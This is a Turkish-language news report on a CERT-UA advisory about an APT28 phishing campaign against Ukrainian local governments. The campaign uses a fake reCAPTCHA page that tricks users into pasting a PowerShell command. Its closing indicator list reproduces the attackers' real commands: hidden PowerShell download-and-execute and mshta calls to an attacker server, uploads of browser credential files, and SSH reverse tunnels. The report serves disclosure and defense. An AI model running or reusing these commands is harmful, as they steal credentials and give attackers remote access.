Ukrayna, Rus askeri istihbaratına (GRU) bağlı bilgisayar korsanlarının yerel yönetimleri hedef aldığı yeni bir siber saldırı vektörüyle karşı karşıya.
Ukrayna Bilgisayar Acil Durum Müdahale Ekibi (CERT-UA) kısa süre önce Rus GRU bağlantılı APT28 veya “Fancy Bear” tarafından gerçekleştirilen gelişmiş bir kimlik avı saldırısını ortaya çıkardı. Saldırganlar, yeni bir yaklaşım kullanarak, alıcıları kötü amaçlı PowerShell komutlarını doğrudan panolarından çalıştırmaya teşvik ediyor; bu, kötü amaçlı yazılımları minimum etkileşimle dağıtmak için yeni bir teknik.
Google’ın reCAPTCHA Benzeri
CERT-UA tarafından işaretlenen e-postalar, “Masa Değiştirme” konu başlığı altında yerel yönetim ofislerinde dolaşırken bulundu. Bu e-postalarda standart ekler yerine Google e-tablosunu taklit eden bir bağlantı bulunur.
Bağlantıya tıklamak, bir bot önleme ekranını taklit ederek şüpheleri ortadan kaldırmak için kullanılan bir taktik olan Google’ın reCAPTCHA taklidini başlatır. Ancak meşru reCAPTCHA istemlerinden farklı olarak bu tuzak, görünmeyen bir eylem gerçekleştirir: Kötü amaçlı bir PowerShell komutunu doğrudan kullanıcının panosuna kopyalar.
Bunu takiben talimatlar, kullanıcılardan komut istemini açan “Win+R” tuşuna basmasını, ardından yapıştırmak için “Ctrl+V” ve ardından çalıştırmak için “Enter” tuşuna basmasını ister. Yürütüldükten sonra yük başlatılarak sistemin tehlikeye girmesine neden olur.
APT28’in taktikleri, bu grupların niyetlerini maskelemek için rutin görevlerde tanıdık eylemlerden nasıl yararlandıklarını gösteriyor. Bu teknik, temel sistem işlevlerinden yararlanır ve kullanıcıların bot doğrulama gibi görünüşte zararsız istemlere olan güvenini artırır.
CERT-UA analizi, komutun bir indirme ve yürütme dizisini başlattığını ortaya koyuyor. Kötü amaçlı bir HTML uygulaması olan “browser.hta”yı başlatıyor ve bu uygulama da Chrome, Edge, Opera ve Firefox gibi popüler tarayıcılardan veri çalmak üzere tasarlanmış bir PowerShell betiği olan “Browser.ps1″i çalıştırıyor.
Ek olarak, sızma için bir SSH tüneli kullanıyor ve çalınan kimlik bilgilerinin ve diğer hassas verilerin doğrudan saldırganlara aktarılmasına olanak tanıyor. En endişe verici yönlerden biri, betiğin, penetrasyon testlerinde yaygın olarak kullanılan ancak tehdit aktörleri arasında giderek daha popüler hale gelen bir araç olan Metasploit çerçevesini indirme ve çalıştırma yeteneğidir.
Süslü Ayı Genişleyen Cephaneliğiyle Süsleniyor
Bu, Ukraynalı kuruluşların APT28’in hedeflenen operasyonlarıyla ilk karşılaşması değil. CERT-UA, Eylül ayında grubun e-posta verilerini yeniden yönlendirmek için Roundcube e-posta güvenlik açığını (CVE-2023-43770) kullandığını bildirdi.
Bu güvenlik açığından yararlanılması, saldırganların e-postaları saldırgan tarafından kontrol edilen bir adrese otomatik olarak ileten bir filtre yerleştirmesine olanak sağladı. Bu saldırı sırasında CERT-UA, güvenliği ihlal edilmiş en az on hükümet e-posta hesabının, Ukrayna savunma bağlantılarına daha fazla istismar göndermek için kullanıldığını tespit etti.
Her iki saldırıda da APT28, güvenliği ihlal edilmiş bir sunucu olan mail.zhblz’i kullandı.[.]com, kontrol için. Bu sunucuya bağlı IP (203.161.50[.]145) önceki kampanyalarda ortaya çıktı ve bu, APT28’in saldırılar boyunca sürekliliği korurken tespitten kaçınmak için gelişen operasyonel altyapısına işaret ediyor.
APT28’in devam eden faaliyetleri nedeniyle CERT-UA, devlet kurumlarının, hem kullanıcı güvenini hem de rutin görevleri istismar etmek için tasarlanmış, hedef odaklı kimlik avı kampanyalarına karşı dikkatli olmalarını tavsiye etti.
Ayrıca şunu okuyun: Rus Hacker Grubu APT28, Sahte Araba Reklamları Yoluyla Diplomatları Hedef Alacak HeadLace Kötü Amaçlı Yazılımını Başlattı
CERT-UA Tarafından Paylaşılan Uzlaşma Göstergeleri
Dosya Karmaları:
e9cb6270f09e3324e6620b8c909a83c6 d34ee70f162ce1dab6a80a6a3c8dabd8d2b1a77345be5b1d956c765752b11802 Browser.ps1 d73124dbb5d8e5702df065a122878740 4e1bc758f08593a873e5e1d6f7d4eac05f690841abc90ddfa713c2bec4f9970f Browser.ps1 597bd15ff25636d9cde61157c2a3c8a2 5200a4e1bb5174a3203ce603c34625493a5a88f0dfb98ed5856b18655fb7ba60 browser.hta 446bab23379df08fecbab6fe9b00344e 3ec9a66609f1bea8f30845e5dbcf927cf0b3e92e40ef40272fdf6d784ba0d0af zapit.exe [METASPLOIT] f389247be7524e2d4afc98f6811622fe e3a3abf8c80637445bab387be288b6475992b6b556cb55a5a8c366401fb864c5 rdp.exe 981943d2e7ec0ab3834c639f49cc4b42 6bbf2b86e023f132416f40690b0386bd00e00cf3e1bef725dec92df7f1cd1007 id_rsa d26920b81f4e6b014a0d63169e68dfa7 edb81219b7728fa2ea1d97d5b3189f498ed09a72b800e115f12843f852b2a441 ssh.exe (legit) d1ccc802272a380b32338d17b2ac40a1 2446ab2e4dc85dc8b27141b2c1f777a01706f16d6608f4b5b0990f8b80dea9e0 libcrypto.dll (legit)
Ağ:
hXXps://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com/document (tcp)://mail.zhblz[.]com:8443 hXXps://mail.zhblz[.]com hXXps://mail.zhblz[.]com/B hXXps://mail.zhblz[.]com/b hXXps://mail.zhblz[.]com/endpoint hXXps://mail.zhblz[.]com/upload hXXps://mail.zhblz[.]com/z hXXps://mail.zhblz[.]com/id_rsa hXXps://mail.zhblz[.]com/libcrypto hXXps://mail.zhblz[.]com/ssh (tcp)://203[.]161.50.145:22 (tcp)://203[.]161.50.145:6211 (tcp)://45[.]61.169.221:445 doc.gmail.com.gyehddhrggdii323sdhnshiswh2udhqjwdhhfjcjeuejcj.zhblz[.]com docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com mail.zhblz[.]com 203[.]161.50.145 45[.]61.169.221 Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes) 103[.]50.33.50 103[.]50.33.54 109[.]236.63.165 185[.]197.248.94 194[.]35.121.200 194[.]35.121.202 194[.]35.121.50 195[.]64.155.64 198[.]54.117.242 203[.]161.50.145 37[.]19.218.144 37[.]19.218.146 37[.]19.218.156 37[.]19.218.157 37[.]19.218.160 37[.]19.218.168 37[.]19.218.174 37[.]19.218.183 45[.]155.43.118 45[.]155.43.121 45[.]94.211.159 45[.]94.211.161 45[.]94.211.164 80[.]77.25.206 95[.]214.216.76 95[.]214.216.78 95[.]214.217.94 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 exchangelib/5.4.2 (python-requests/2.32.3)
Sunucular:
%APPDATA%\id_rsa
%APPDATA%\zapit.exe
%APPDATA%\ssh.exe
%APPDATA%\libcrypto.dll
C:\Users\Malgus\source\repos\rdp\rdp\obj\Debug\rdp.pdb
mshta https://mail.zhblz.com/b
ssh [email protected] -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no -o "PermitLocalCommand=yes" -o "LocalCommand=ssh -i \\45.61.169.221\key.pem [email protected] .1.1"
%APPDATA%\ssh.exe [email protected] -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no
powershell -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('https://mail.zhblz.com/B');pumpndump -hq https://mail.zhblz. com;mshta https://mail.zhblz.com/b # ✅ ''I am not a robot - reCAPTCHA ID: {verification_id}''"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename="logins.json";file=" "}|ConvertTo-Json) -ContentType 'application/json'"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename="key4.db";file=" "}|ConvertTo-Json) -ContentType 'application/json'"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/libcrypto -OutFile %APPDATA%\libcrypto.dll"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/ssh -OutFile %APPDATA%\ssh.exe"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/z -OutFile %APPDATA%\zapit.exe"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest https://mail.zhblz.com/id_rsa -OutFile $env:APPDATA\id_rsa"
İlgili